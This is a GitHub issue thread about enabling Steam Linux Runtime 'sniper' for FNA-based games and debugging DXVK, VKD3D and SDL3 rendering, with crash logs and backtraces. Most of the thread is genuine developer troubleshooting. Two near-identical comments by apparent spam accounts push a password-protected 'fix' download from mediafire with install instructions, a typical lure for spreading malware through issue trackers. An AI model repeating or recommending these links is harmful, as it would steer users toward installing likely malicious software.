### ISSUE TITLE
Enable Sniper for FNA catalog, part 1

### ISSUE THREAD

**Issue by flibitijibibo** [ValveSoftware/steam-runtime#687]
I'll be making a ton of requests over the next year or so (~70 in total I think), but here are some that should work today:

- Super Hexagon (221640)
- FEZ (224760)
- The Dishwasher: Vampire Smile (268990)
- Salt & Sanctuary (283640)
- Charlie Murder (405290)
- Streets of Rage 4 (985890)
- TMNT: Shredder's Revenge (1361510)

One other question: Is it possible to enable access to Sniper for an appid in the compatibility tools dropdown without necessarily setting it by default? If so I can probably just send the complete list of appids now, but the above make the best use of it as of writing.

Thanks in advance!

**Comment by TTimo** [comment]
Developers can use `-compat-disable-filtering` to force a (possibly completely incompatible) SLR. Obviously we don't recommend this for users.

We can map specific branches to sniper. Is this something you want to do for the games above, or should we set them to sniper by default right away? Do you have another set of titles that we should apply a branch specific mapping for?

Since I don't do those edits directly but pass them on to someone else, I'd like to minimize the amount of back and forth.

**Comment by flibitijibibo** [comment]
Since we have the filtering flag let's hold off entirely for now - going to just check against all the titles I still maintain, should have the complete list of appids this week!

**Comment by smcv** [comment]
> Is it possible to enable access to Sniper for an appid in the compatibility tools dropdown without necessarily setting it by default?

The reason why you can't do this without a developer-oriented override is:

The design assumption is that either you compiled your game in a scout SDK targeting scout, or you compiled your game in a sniper SDK targeting sniper.

If you compiled in scout, then running it in sniper is probably wrong, because sniper doesn't provide all of the obsolete library SONAMEs that scout has (e.g. no GTK 2).

Conversely, if you compiled it in sniper, then running it in scout is probably equally wrong, because the minimum API/ABI that we can guarantee to provide is more than a decade old and is probably missing functions that you want to call.

We don't really optimize for the case of titles that were compiled in scout, sniper, or some other build environment entirely, and accidentally or intentionally use such a small subset of the runtime's available API/ABI that they happen to work equally well in either scout or sniper.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by smcv** [comment]
@flibitijibibo, as announced in https://store.steampowered.com/news/group/4397053/view/4507632124224426488?l=english, you should now be able to configure your games to run in sniper on a self-service basis via the partner web interface, without needing someone from Valve to step in. [Documentation](https://partner.steamgames.com/doc/store/application/platforms/linux) mentions an "Installation > Linux Runtime" menu item.

**Comment by smcv** [comment]
@flibitijibibo, in the latest sniper SDK beta (`registry.gitlab.steamos.cloud/steamrt/sniper/sdk:latest-container-runtime-public-beta`) we've updated VKD3D to 1.14 and DXVK Native to 2.5.1. As usual for the beta, this can be used for experimenting, but shouldn't be used to ship production games until it goes to stable.

(`registry.gitlab.steamos.cloud/steamrt/sniper/sdk:beta` currently lags behind that version a bit as a result of the way a different version of sniper is used internally within Steam itself, to run the `steamwebhelper`.)

Do you have any examples of FNA games that actively use these libraries and could be used as a smoke-test for future upgrades? Ideally free-to-play or with demos available, so that any developer or tester can easily try them, without needing to arrange access to keys?

**Comment by flibitijibibo** [comment]
I've pushed an `sdl3` Steam branch to [I MAED A GAM3 W1TH Z0MB1ES IN IT](https://store.steampowered.com/app/1800730/I_MAED_A_GAM3_W1TH_Z0MB1ES_1N_IT1/), which is a free game using FNA - by default it uses SDL_GPU but DXVK can be tested by passing `/gldevice:D3D11` as a launch option!

**Comment by smcv** [comment]
> EDIT: Should point out that D3D11 will only work after SDL3 is in the SDK, so that dxvk can build with SDL3 support.

At the moment we build DXVK Native 2.5.1 with only the SDL2 WSI, but the next time we update DXVK Native, it's likely to go to 2.6 with the SDL2 and SDL3 WSIs available. I have a branch which is being tested internally, based on backporting https://salsa.debian.org/aviau/dxvk/-/merge_requests/4 which is the variant I'm trying to send to Debian.

To try this out yourself, you can build DXVK in a sniper environment (we have SDL3 available in the stable SDK since February) and put it in your `LD_LIBRARY_PATH`.

As usual you will need to set environment variable `DXVK_WSI_DRIVER=SDL2` or `DXVK_WSI_DRIVER=SDL3`, either in a wrapper script or as a `setenv()` or `putenv()` or similar (which for thread safety will have to be done as early as possible in `main()`, before you have started your second thread).

For testing purposes I'm using [`PRESSURE_VESSEL_SHELL=instead %command%`](https://gitlab.steamos.cloud/steamrt/steam-runtime-tools/-/blob/main/docs/slr-for-game-developers.md#running-in-an-interactive-shell) and doing the environment variable setup manually.

> I've pushed an `sdl3` Steam branch to [I MAED A GAM3 W1TH Z0MB1ES IN IT](https://store.steampowered.com/app/1800730/I_MAED_A_GAM3_W1TH_Z0MB1ES_1N_IT1/), which is a free game using FNA - by default it uses SDL_GPU but DXVK can be tested by passing `/gldevice:D3D11` as a launch option!

Sorry for the delay, I have now tried this but I get: `System.InvalidOperationException: No supported FNA3D driver found!`

Steps that I tried:

* replace `steamapps/common/SteamLinuxRuntime_sniper` with my unreleased test-build (DXVK Native updated to 2.6 with both SDL2 and SDL3 WSIs enabled, VKD3D updated to 1.15)
    * contents subject to change, no guarantee of these getting released until you actually see them in a public beta
    * to replicate this without unreleased packages, you would have to build your own DXVK and optionally VKD3D locally, and add them to your `LD_LIBRARY_PATH` or similar
* set game launch options to `PRESSURE_VESSEL_SHELL=instead %command%`
* launch game, instead of the game you should get an `xterm`
* at the `xterm` prompt, run: `"$@"` (with the quotes)
    * expected result: game runs, with whatever is your default renderer (SDL_gpu?)
    * actual result: yes
* try gameplay if you want, then exit
* still at the `xterm` prompt, run: `DXVK_WSI_DRIVER=SDL3 "$@" /gldevice:D3D11`
    * prepend `LD_LIBRARY_PATH="/path/to/your/dxvk:$LD_LIBRARY_PATH" ` if you're using a locally-built DXVK
    * expected result: game runs, with D3D11 renderer; `/proc/*/maps` should say it has loaded our `libdxvk_d3d11.so.0` and maybe `libvkd3d*` (from the container's `/usr/lib` or your `$LD_LIBRARY_PATH`)
    * actual result: `System.InvalidOperationException: No supported FNA3D driver found!`

**Comment by smcv** [comment]
For completeness I tried the default (SDL2-based) branch with `DXVK_WSI_DRIVER=SDL2 "$@" /gldevice:D3D11`, and got a similar result.

**Comment by flibitijibibo** [comment]
Will investigate this weekend, we've got a few wacky scenarios where we're having to reroute SDL2 C# calls to SDL3 so that might be what's up - some other `sdl3` branches include Rogue Legacy, Streets of Rage 4, TMNT Shredder's Revenge, FEZ, and Salt & Sanctuary, most of which have less sloppy redirecting 😅

**Comment by smcv** [comment]
Looking at FNA3D source code, it seems like it wants `FNA3D_FORCE_DRIVER=D3D11` in the environment, but that isn't making any difference for me.

I also tried substituting a locally-built `libFNA3D.so.0` built in a sniper SDK (which appears to get DXVK and VKD3D support enabled, unlike the one bundled with the game), and running with that prepended to the `LD_LIBRARY_PATH`, having renamed the one bundled with the game out of the way. This seems closer, but is failing with:

```
err:   Failed to initialize WSI.
err:   D3D11CreateDevice: Failed to create a DXGI factory
Creating device with feature level 11_1 failed. Lowering feature level.
```

followed by a segfault.

**Comment by flibitijibibo** [comment]
I think this might be something with the dxvk build system - the same binaries work when using either a self-built dxvk or the steamrt-sniper builds from dxvk CI, but Fedora's doesn't appear to have the SDL3 WSI even though it's in their spec file, I wonder if this affects others too: https://src.fedoraproject.org/rpms/dxvk-native/blob/f41/f/dxvk-native.spec

Once that's fixed we get an FPE, working on this now.

**Comment by flibitijibibo** [comment]
Fix for dxvk on Xwayland https://github.com/doitsujin/dxvk/pull/4825

Still dunno why some build configs don't recognize that SDL3 is present though.

**Comment by smcv** [comment]
> the same binaries work when using either a self-built dxvk or the steamrt-sniper builds from dxvk CI, but Fedora's doesn't appear to have the SDL3 WSI even though it's in their spec file

As far as I can see it's an [automagic dependency](https://wiki.gentoo.org/wiki/Project:Quality_Assurance/Automagic_dependencies) with no explicit on/off switch, so if it isn't getting enabled in Fedora, that would presumably imply that the build system isn't detecting SDL3 for whatever reason.

**Comment by smcv** [comment]
OK, I have this sort-of-working with a few library versions from the future.

* Host OS: tested Ubuntu 24.04
    * in particular glibc is strictly older than 2.41: this is important to avoid [a known bug in how vkd3d is packaged](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1101937), which has a fix queued for the next sniper beta
    * Arch, Debian testing or a similar rolling release with glibc 2.41 will *not* work yet (but in the next sniper beta it should)
* installed `SteamLinuxRuntime_sniper` 3.0.20250306.120299 from the `client_beta` public beta branch (no unreleased stuff from my side this time)
* DXVK snapshot from upstream CI run https://github.com/doitsujin/dxvk/actions/runs/14253703270 as built in a sniper SDK, `cp --dereference .../libdxvk_*.so.0 IMAGWZII/lib64`, as a preview of what it will pick up from the sniper runtime when the next DXVK release becomes available
    * these should be deleted when sniper is updated with a sufficiently new DXVK
    * I've been told that 2.6 has some known regressions, so hopefully there will be a 2.6.1 that I can package reasonably soon
* IMAGWZII `sdl3` public beta branch
* renamed `IMAGWZII/lib64/libSDL3.so.0` to `IMAGWZII/lib64/libSDL3.so.0.shipped` so we'll use the copy of SDL3 from sniper instead
    * you can bundle your own SDL3 if you must, but I wouldn't recommend it - the one in sniper is regularly updated
* IMAGWZII launch options set to `steam-runtime-launch-options -- %command%` to get control over how it is launched

`IMAGWZII/lib64/libFNA3D.so.0` doesn't seem to contain any mentions of `dxvk` or `vkd3d`, so I assume the one shipped with IMAGWZII was compiled in some environment that does not have DXVK or VKD3D yet, and will need to be replaced with a newer/better build when this is a bit further along? I replaced it with a locally-built copy that I compiled in the sniper SDK, which *does* have mentions of those libraries in it:

```
user@host:~/SteamLibrary/steamapps/common$ strings IMAGWZII/lib64/libFNA3D.so.0 |grep -i dxvk
Could not find libdxvk_dxgi.so.0
Could not find libdxvk_d3d11.so.0
DXVK_WSI_DRIVER
libdxvk_d3d11.so.0
libdxvk_dxgi.so.0
user@host:~/SteamLibrary/steamapps/common$ strings IMAGWZII/lib64/libFNA3D.so.0 |grep -i vkd3d
_libvkd3d-utils.so.1
vkd3d_shader_get_version
```

Then in the `Launch options` developer UI that appears when I launch the game, I set:

* Container runtime: sniper 3.0.20250306.120299
* Layered runtime scripts: None
* Interactive shell: `Instead of running the command`
* All other options left at their defaults, usually `Don't override`

and in the resulting xterm, I tried:

* `"$@"` → works, but is using `SDL_GPU Driver: Vulkan` so presumably not actually using DXVK yet
* `"$@" /gldevice:D3D11` → works, shows signs of using VKD3D and DXVK
* `FNA3D_FORCE_DRIVER=D3D11 "$@"` → works, shows signs of using VKD3D and DXVK

So this all looks promising, and the errata here are:

* On the sniper side, we need to update VKD3D to a version that is compatible with newer glibc: this is queued for the next beta, which will also update to VKD3D 1.15
* On the sniper side, we need to update DXVK to 2.6.1 when it becomes available, which will incorporate the fixes you made recently
* On the game side, IMAGWZII needs its `libFNA3D.so.0` rebuilt in a sufficiently recent sniper SDK, so that it finds DXVK and VKD3D
* On the game side, optionally IMAGWZII can stop bundling its own copy of SDL3 (sniper provides a recent version, the next sniper beta should have 3.2.10)

**Comment by flibitijibibo** [comment]
Pushed an update to IMAGWZII to use the latest FNA and fnalibs, and also removes the launcher script now that SDL3 is our default backend. With the dxvk fixes we should be back in working order!

**Comment by smcv** [comment]
Thanks, when the new DXVK becomes available I'll try IMAGWZII again.

**Comment by smcv** [comment]
Unfortunately, with DXVK 2.6.1 and the updated IMAGWZII, I'm now getting this crash:

```
Controller 0: X360 Controller, …
info:  Game: Z0MB1ES
info:  DXVK: 2.6.1
info:  Build: x86_64 gcc 10.3.0
err:   Failed to initialize WSI.
err:   D3D11CreateDevice: Failed to create a DXGI factory
Creating device with feature level 11_1 failed. Lowering feature level.

=================================================================
	Native Crash Reporting
=================================================================
Got a SIGSEGV while executing native code. This usually indicates
a fatal error in the mono runtime or one of the native libraries 
used by your application.
=================================================================
```

```
(gdb) bt
#0  0x00007ffff1b0dbf3 in ?? () from target:/lib/x86_64-linux-gnu/libdxvk_dxgi.so.0
#1  0x00007ffff1a4f7ee in ?? () from target:/lib/x86_64-linux-gnu/libdxvk_dxgi.so.0
#2  0x00007ffff1a49c73 in ?? () from target:/lib/x86_64-linux-gnu/libdxvk_dxgi.so.0
#3  0x00007ffff1a4e75c in ?? () from target:/lib/x86_64-linux-gnu/libdxvk_dxgi.so.0
#4  0x00007ffff1ee4fba in ?? () from target:/lib/x86_64-linux-gnu/libdxvk_d3d11.so.0
#5  0x00007ffff1ee53e9 in D3D11CreateDevice () from target:/lib/x86_64-linux-gnu/libdxvk_d3d11.so.0
#6  0x00007ffff336afc9 in D3D11_PrepareWindowAttributes ()
   from target:/home/me/SteamLibrary/steamapps/common/IMAGWZII/lib64/libFNA3D.so.0
#7  0x00007ffff33684fd in FNA3D_PrepareWindowAttributes ()
   from target:/home/me/SteamLibrary/steamapps/common/IMAGWZII/lib64/libFNA3D.so.0
#8  0x00000000400546d9 in ?? ()
#9  0x00007fffffff8fa8 in ?? ()
#10 0x0000000000bfc880 in ?? ()
#11 0x0000000000000000 in ?? ()
```

**Comment by smcv** [comment]
The SDL3 WSI doesn't seem to have been compiled in, I'll continue to investigate this on the Steam Runtime side.

**Comment by smcv** [comment]
> The SDL3 WSI doesn't seem to have been compiled in, I'll continue to investigate this on the Steam Runtime side.

Hopefully fixed by https://github.com/doitsujin/dxvk/pull/4835. https://github.com/doitsujin/dxvk/pull/4838 will also help.

**Comment by smcv** [comment]
I can successfully run IMAGWZII sdl3 branch with command-line option `/gldevice:D3D11` against DXVK 2.6.1 + https://github.com/doitsujin/dxvk/pull/4835 + https://github.com/doitsujin/dxvk/pull/4838, which barring any other showstoppers will be in the next sniper beta.

**Comment by smcv** [comment]
> I can successfully run IMAGWZII sdl3 branch with command-line option `/gldevice:D3D11` against DXVK 2.6.1 + [doitsujin/dxvk#4835](https://github.com/doitsujin/dxvk/pull/4835) + [doitsujin/dxvk#4838](https://github.com/doitsujin/dxvk/pull/4838), which barring any other showstoppers will be in the next sniper beta.

The necessary DXVK version to support this was included in today's sniper public beta update, 3.0.20250408.124536, which will be promoted to the default branch when it has had some more testing. You can opt-in to the `client_beta` branch of `Steam Linux Runtime 3.0 - sniper` to get a preview of this.

(Older sniper versions, including today's stable update, only had the SDL2 WSI for DXVK enabled - so they could work with SDL2 games like some of Valve's Source 1 titles, but their DXVK would never work with SDL3 games.)
